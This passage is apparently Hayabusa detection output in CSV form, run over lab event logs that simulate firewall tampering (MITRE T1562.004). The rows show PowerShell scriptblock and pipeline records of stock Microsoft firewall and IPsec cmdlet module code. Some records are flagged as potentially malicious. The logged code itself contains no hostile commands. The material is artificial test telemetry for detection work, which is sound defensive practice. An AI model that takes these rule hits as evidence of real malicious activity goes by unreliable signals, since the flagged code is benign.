[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown 
= $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] 
[switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.144 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.145 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 
+2021-04-23 10:09:45.177 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.177 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias 
'*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.178 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.178 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.178 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.179 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
